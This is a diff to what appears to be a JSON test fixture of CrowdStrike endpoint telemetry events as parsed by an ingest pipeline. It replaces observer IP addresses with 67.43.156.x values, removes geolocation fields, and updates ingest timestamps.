"{\"event_simpleName\":\"AsepFileChange\",\"ContextTimeStamp\":\"1625677482.148\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364936256754041721\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"AsepFileChangeMacV1\",\"id\":\"ffffffff-1111-11eb-9e50-064be6e56df7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffff1a64286a233d09974b1b377\",\"timestamp\":\"1625677482403\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs\",\"VnodeModificationType\":\"6\"}", "created": "2021-07-07T17:04:42.403Z", "kind": "event", "action": 
"AsepFileChange", @@ -5632,21 +4956,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.194.125.248", - "vendor": "crowdstrike", - "ip": "208.194.125.248", "serial_number": "ffffffffdd094539a02b394c69a70aaf", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0010912.1" + "version": "1007.8.0010912.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:10.959Z", "ecs": { 
@@ -5654,18 +4969,18 @@ }, "related": { "hosts": [ - "208.194.125.248" + "67.43.156.14" ], "hash": [ "1284133626" ], "ip": [ - "208.194.125.248" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465867300Z", - "original": "{\"event_simpleName\":\"TerminateProcess\",\"RawProcessId\":\"76482\",\"ContextTimeStamp\":\"1625677510.959\",\"ConfigStateHash\":\"1284133626\",\"ContextProcessId\":\"130732827553316\",\"ContextThreadId\":\"0\",\"aip\":\"208.194.125.248\",\"ConfigBuild\":\"1007.8.0010912.1\",\"event_platform\":\"Lin\",\"TargetProcessId\":\"130732827553316\",\"Entitlements\":\"15\",\"name\":\"TerminateProcessLinV2\",\"id\":\"ffffffff-1111-11eb-97d0-02b2813216eb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffdd094539a02b394c69a70aaf\",\"timestamp\":\"1625677511067\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150981100Z", + "original": "{\"event_simpleName\":\"TerminateProcess\",\"RawProcessId\":\"76482\",\"ContextTimeStamp\":\"1625677510.959\",\"ConfigStateHash\":\"1284133626\",\"ContextProcessId\":\"130732827553316\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0010912.1\",\"event_platform\":\"Lin\",\"TargetProcessId\":\"130732827553316\",\"Entitlements\":\"15\",\"name\":\"TerminateProcessLinV2\",\"id\":\"ffffffff-1111-11eb-97d0-02b2813216eb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffdd094539a02b394c69a70aaf\",\"timestamp\":\"1625677511067\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:11.067Z", "kind": "event", "action": "TerminateProcess", 
@@ -5689,21 +5004,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.31.114.187", - "vendor": "crowdstrike", - "ip": "208.31.114.187", "serial_number": "ffffffff70cf4070af024397f25007c7", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:52.544Z", "os": { @@ -5714,18 +5020,18 @@ }, "related": { "hosts": [ - "208.31.114.187" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.31.114.187" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465874Z", - "original": "{\"ConfigBuild\":\"1007.4.0013701.1\",\"event_simpleName\":\"FirewallEnabled\",\"event_platform\":\"Mac\",\"ConfigStateHash\":\"3090255842\",\"Entitlements\":\"15\",\"name\":\"FirewallEnabledMacV1\",\"aip\":\"208.31.114.187\",\"id\":\"ffffffff-1111-11eb-a9e6-067d21325a03\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff70cf4070af024397f25007c7\",\"timestamp\":\"1625677372544\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150987400Z", + "original": "{\"ConfigBuild\":\"1007.4.0013701.1\",\"event_simpleName\":\"FirewallEnabled\",\"event_platform\":\"Mac\",\"ConfigStateHash\":\"3090255842\",\"Entitlements\":\"15\",\"name\":\"FirewallEnabledMacV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-a9e6-067d21325a03\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff70cf4070af024397f25007c7\",\"timestamp\":\"1625677372544\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:02:52.544Z", "kind": "event", "action": "FirewallEnabled", 
@@ -5755,24 +5061,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-NY", - "city_name": "Lakewood", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "New York", - "location": { - "lon": -79.3291, - "lat": 42.0973 - } - }, - "address": "208.105.245.7", - "vendor": "crowdstrike", - "ip": "208.105.245.7", "serial_number": "ffffffffed984e248973f3ada1eb543d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:12.283Z", "os": { 
@@ -5783,18 +5077,18 @@ }, "related": { "hosts": [ - "208.105.245.7" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.105.245.7" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465880700Z", - "original": "{\"event_simpleName\":\"FsVolumeUnmounted\",\"VolumeName\":\"Install Google Drive\",\"ContextTimeStamp\":\"1625677332.283\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"208.105.245.7\",\"VolumeMediaBSDName\":\"disk2s2\",\"VolumeMountPoint\":\"/private/tmp/KSInstallAction.dn6J5Xa1M4/m\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"FsVolumeUnmountedMacV1\",\"id\":\"ffffffff-1111-11eb-8fd9-06866dcbd3d5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffed984e248973f3ada1eb543d\",\"timestamp\":\"1625677334451\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", + "ingested": "2021-12-09T13:36:11.150997400Z", + "original": "{\"event_simpleName\":\"FsVolumeUnmounted\",\"VolumeName\":\"Install Google Drive\",\"ContextTimeStamp\":\"1625677332.283\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"VolumeMediaBSDName\":\"disk2s2\",\"VolumeMountPoint\":\"/private/tmp/KSInstallAction.dn6J5Xa1M4/m\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"FsVolumeUnmountedMacV1\",\"id\":\"ffffffff-1111-11eb-8fd9-06866dcbd3d5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffed984e248973f3ada1eb543d\",\"timestamp\":\"1625677334451\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", "created": "2021-07-07T17:02:14.451Z", "kind": "event", "action": "FsVolumeUnmounted", 
@@ -5854,21 +5148,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.231.69.37", - "vendor": "crowdstrike", - "ip": "208.231.69.37", "serial_number": "ffffffff2a0d484da8f7a9cf8bde7164", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:34.525Z", "ecs": { 
@@ -5876,20 +5161,20 @@ }, "related": { "hosts": [ - "208.231.69.37", + "67.43.156.14", "0.0.0.0" ], "hash": [ "2300098580" ], "ip": [ - "208.231.69.37", + "67.43.156.14", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465887400Z", - "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677474.525\",\"ConfigStateHash\":\"2300098580\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"328911864662804336\",\"RemotePort\":\"0\",\"aip\":\"208.231.69.37\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"23165\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4LinV5\",\"id\":\"ffffffff-1111-11eb-88fd-06a17d0fdc05\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff2a0d484da8f7a9cf8bde7164\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677474879\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151003800Z", + "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677474.525\",\"ConfigStateHash\":\"2300098580\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"328911864662804336\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"23165\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4LinV5\",\"id\":\"ffffffff-1111-11eb-88fd-06a17d0fdc05\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff2a0d484da8f7a9cf8bde7164\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677474879\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:34.879Z", "kind": "event", "action": "NetworkListenIP4", 
@@ -5929,21 +5214,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.116.10", - "vendor": "crowdstrike", - "ip": "208.24.116.10", "serial_number": "ffffffff28414c2293e35c360213e723", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:26.828Z", "file": { 
@@ -5963,20 +5239,20 @@ }, "related": { "hosts": [ - "208.24.116.10" + "67.43.156.14" ], "hash": [ "35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027", "1620585913" ], "ip": [ - "208.24.116.10" + "67.43.156.14" ] }, "event": { "action": "ELFFileWritten", - "ingested": "2021-11-22T09:23:55.465894200Z", - "original": "{\"event_simpleName\":\"ELFFileWritten\",\"ContextTimeStamp\":\"1625677526.828\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"363122200934575406\",\"Size\":\"38798952\",\"ContextThreadId\":\"0\",\"aip\":\"208.24.116.10\",\"SHA256HashData\":\"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027\",\"FileIdentifier\":\"040000010000000000000000000000006793f80200000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ELFFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"ELFSubType\":\"4\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677527114\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe\"}", + "ingested": "2021-12-09T13:36:11.151010100Z", + "original": 
"{\"event_simpleName\":\"ELFFileWritten\",\"ContextTimeStamp\":\"1625677526.828\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"363122200934575406\",\"Size\":\"38798952\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027\",\"FileIdentifier\":\"040000010000000000000000000000006793f80200000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ELFFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"ELFSubType\":\"4\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677527114\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe\"}", "id": "ffffffff-1111-11eb-985c-02152dd35bc1", "created": "2021-07-07T17:05:27.114Z" }, @@ -5991,21 +5267,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffff2d1245c0a32d5efcf9351272", + "address": "67.43.156.14", "type": "agent", - "version": "6.19.11611.0" + "version": "6.19.11611.0", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:03.466Z", "os": { 
@@ -6017,18 +5284,18 @@ }, "related": { "hosts": [ - "208.203.151.21" + "67.43.156.14" ], "hash": [ "3712162471" ], "ip": [ - "208.203.151.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465900900Z", - "original": "{\"MajorVersion\":\"4\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a\",\"BootArgs\":\"BOOT_IMAGE\\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\\u003dUUID\\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\\u003dtty0 console\\u003dttyS0,115200n8 net.ifnames\\u003d0 biosdevname\\u003d0 nvme_core.io_timeout\\u003d4294967295 rd.emergency\\u003dpoweroff rd.shell\\u003d0\",\"ConfigStateHash\":\"3712162471\",\"AgentVersion\":\"6.19.11611.0\",\"aip\":\"208.203.151.21\",\"MinorVersion\":\"14\",\"OSVersionString\":\"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"OsVersionInfoLinV4\",\"RFMState\":\"1\",\"id\":\"ffffffff-1111-11eb-93d4-0624c36f3a79\",\"OSVersionFileName\":\"/etc/os-release\",\"aid\":\"ffffffff2d1245c0a32d5efcf9351272\",\"timestamp\":\"1625677383466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151016300Z", + "original": 
"{\"MajorVersion\":\"4\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a\",\"BootArgs\":\"BOOT_IMAGE\\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\\u003dUUID\\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\\u003dtty0 console\\u003dttyS0,115200n8 net.ifnames\\u003d0 biosdevname\\u003d0 nvme_core.io_timeout\\u003d4294967295 rd.emergency\\u003dpoweroff rd.shell\\u003d0\",\"ConfigStateHash\":\"3712162471\",\"AgentVersion\":\"6.19.11611.0\",\"aip\":\"67.43.156.14\",\"MinorVersion\":\"14\",\"OSVersionString\":\"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"OsVersionInfoLinV4\",\"RFMState\":\"1\",\"id\":\"ffffffff-1111-11eb-93d4-0624c36f3a79\",\"OSVersionFileName\":\"/etc/os-release\",\"aid\":\"ffffffff2d1245c0a32d5efcf9351272\",\"timestamp\":\"1625677383466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:03.466Z", "kind": "event", "action": "OsVersionInfo", 
@@ -6088,21 +5355,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.154.14", - "vendor": "crowdstrike", - "ip": "208.216.154.14", "serial_number": "ffffffff761b4a7d9962dd9e7e776044", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:03:59.099Z", "file": { 
@@ -6117,18 +5375,18 @@ }, "related": { "hosts": [ - "208.216.154.14" + "67.43.156.13" ], "hash": [ "3090255842" ], "ip": [ - "208.216.154.14" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465907500Z", - "original": "{\"event_simpleName\":\"CriticalFileModified\",\"ContextTimeStamp\":\"1625677439.099\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364849347227309005\",\"ContextThreadId\":\"0\",\"aip\":\"208.216.154.14\",\"FileIdentifier\":\"04000001000000000000000000000000cdf3100100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"USN\":\"89566685\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileModifiedMacV2\",\"id\":\"ffffffff-1111-11eb-9262-0268ab613b49\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff761b4a7d9962dd9e7e776044\",\"timestamp\":\"1625677439398\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/user9.plist/\"}", + "ingested": "2021-12-09T13:36:11.151022700Z", + "original": "{\"event_simpleName\":\"CriticalFileModified\",\"ContextTimeStamp\":\"1625677439.099\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364849347227309005\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"FileIdentifier\":\"04000001000000000000000000000000cdf3100100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"USN\":\"89566685\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileModifiedMacV2\",\"id\":\"ffffffff-1111-11eb-9262-0268ab613b49\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff761b4a7d9962dd9e7e776044\",\"timestamp\":\"1625677439398\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/user9.plist/\"}", "created": "2021-07-07T17:03:59.398Z", "kind": "alert", "action": "CriticalFileModified", 
@@ -6155,25 +5413,16 @@ "group": { "id": "0" } - } - }, - { - "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.230.229.237", - "vendor": "crowdstrike", - "ip": "208.230.229.237", + } + }, + { + "observer": { "serial_number": "ffffffff01c7450180352a7c58a28fb4", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:49.786Z", "os": { 
@@ -6184,18 +5433,18 @@ }, "related": { "hosts": [ - "208.230.229.237" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.230.229.237" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465914300Z", - "original": "{\"event_simpleName\":\"NeighborListIP6\",\"ConfigStateHash\":\"3090255842\",\"NeighborList\":\"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|\",\"aip\":\"208.230.229.237\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP6MacV1\",\"id\":\"ffffffff-1111-11eb-ac8a-06b5e1186139\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01c7450180352a7c58a28fb4\",\"timestamp\":\"1625677489786\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151029100Z", + "original": "{\"event_simpleName\":\"NeighborListIP6\",\"ConfigStateHash\":\"3090255842\",\"NeighborList\":\"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP6MacV1\",\"id\":\"ffffffff-1111-11eb-ac8a-06b5e1186139\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01c7450180352a7c58a28fb4\",\"timestamp\":\"1625677489786\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:49.786Z", "kind": "state", "action": "NeighborListIP6", 
@@ -6246,24 +5495,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-TN", - "city_name": "Nashville", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Tennessee", - "location": { - "lon": -86.7821, - "lat": 36.165 - } - }, - "address": "208.182.203.47", - "vendor": "crowdstrike", - "ip": "208.182.203.47", "serial_number": "ffffffffcebd42c0890d59b54279d3d3", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013806.1" + "version": "1007.4.0013806.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:02.785Z", "file": { 
@@ -6283,19 +5520,19 @@ "user3" ], "hosts": [ - "208.182.203.47" + "67.43.156.14" ], "hash": [ "359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6", "1325353086" ], "ip": [ - "208.182.203.47" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465920900Z", - "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677382.785\",\"UserName\":\"user3\",\"ConfigStateHash\":\"1325353086\",\"ContextProcessId\":\"364952259879648742\",\"Size\":\"8052\",\"ContextThreadId\":\"0\",\"aip\":\"208.182.203.47\",\"SHA256HashData\":\"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6\",\"FileIdentifier\":\"04000001000000000000000000000000ef07570000000000\",\"ConfigBuild\":\"1007.4.0013806.1\",\"event_platform\":\"Mac\",\"IsOnRemovableDisk\":\"0\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc1-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffcebd42c0890d59b54279d3d3\",\"timestamp\":\"1625677383057\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh\"}", + "ingested": "2021-12-09T13:36:11.151035400Z", + "original": 
"{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677382.785\",\"UserName\":\"user3\",\"ConfigStateHash\":\"1325353086\",\"ContextProcessId\":\"364952259879648742\",\"Size\":\"8052\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6\",\"FileIdentifier\":\"04000001000000000000000000000000ef07570000000000\",\"ConfigBuild\":\"1007.4.0013806.1\",\"event_platform\":\"Mac\",\"IsOnRemovableDisk\":\"0\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc1-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffcebd42c0890d59b54279d3d3\",\"timestamp\":\"1625677383057\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh\"}", "created": "2021-07-07T17:03:03.057Z", "kind": "event", "action": "NewScriptWritten", @@ -6322,21 +5559,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.145.211.220", - "vendor": "crowdstrike", - "ip": "208.145.211.220", "serial_number": "fffffffff2c7432859ff6bbe1a0bd6af", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:03:07.216Z", "os": { 
@@ -6347,18 +5575,18 @@ }, "related": { "hosts": [ - "208.145.211.220" + "67.43.156.13" ], "hash": [ "1620585913" ], "ip": [ - "208.145.211.220" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465927600Z", - "original": "{\"event_simpleName\":\"SystemCapacity\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"208.145.211.220\",\"CpuClockSpeed\":\"2400000000\",\"PhysicalCoreCount\":\"8\",\"CpuFeaturesMask\":\"7494065083908067\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LogicalCoreCount\":\"16\",\"Entitlements\":\"15\",\"name\":\"SystemCapacityMacV1\",\"CpuVendor\":\"0\",\"CpuProcessorName\":\"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\",\"id\":\"ffffffff-1111-11eb-b714-066001392751\",\"CpuSignature\":\"591597\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"fffffffff2c7432859ff6bbe1a0bd6af\",\"ProcessorPackageCount\":\"1\",\"MemoryTotal\":\"17179869184\",\"timestamp\":\"1625677387216\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151041700Z", + "original": "{\"event_simpleName\":\"SystemCapacity\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"67.43.156.13\",\"CpuClockSpeed\":\"2400000000\",\"PhysicalCoreCount\":\"8\",\"CpuFeaturesMask\":\"7494065083908067\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LogicalCoreCount\":\"16\",\"Entitlements\":\"15\",\"name\":\"SystemCapacityMacV1\",\"CpuVendor\":\"0\",\"CpuProcessorName\":\"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\",\"id\":\"ffffffff-1111-11eb-b714-066001392751\",\"CpuSignature\":\"591597\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"fffffffff2c7432859ff6bbe1a0bd6af\",\"ProcessorPackageCount\":\"1\",\"MemoryTotal\":\"17179869184\",\"timestamp\":\"1625677387216\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:07.216Z", "kind": "state", 